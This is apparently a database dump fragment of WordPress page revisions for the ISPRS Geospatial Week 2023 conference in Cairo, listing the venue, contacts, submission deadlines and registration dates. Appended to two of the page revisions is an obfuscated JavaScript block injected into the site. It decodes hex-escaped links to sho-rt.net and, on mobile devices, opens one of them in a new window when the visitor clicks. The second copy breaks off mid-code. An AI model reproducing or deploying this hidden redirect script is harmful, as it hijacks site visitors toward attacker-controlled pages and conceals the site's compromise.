img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-03-30 05:29:12','2023-03-30 05:29:12','',3066,'https://gsw2023.com/?p=3969',0,'revision','',0),
(3970,1,'2023-03-30 05:36:50','2023-03-30 05:36:50','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: 2023 May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 15, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Late registration deadline: July 15, 2023 <span style=\"text-decoration: line-through;\">July 1, 2023</span></li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 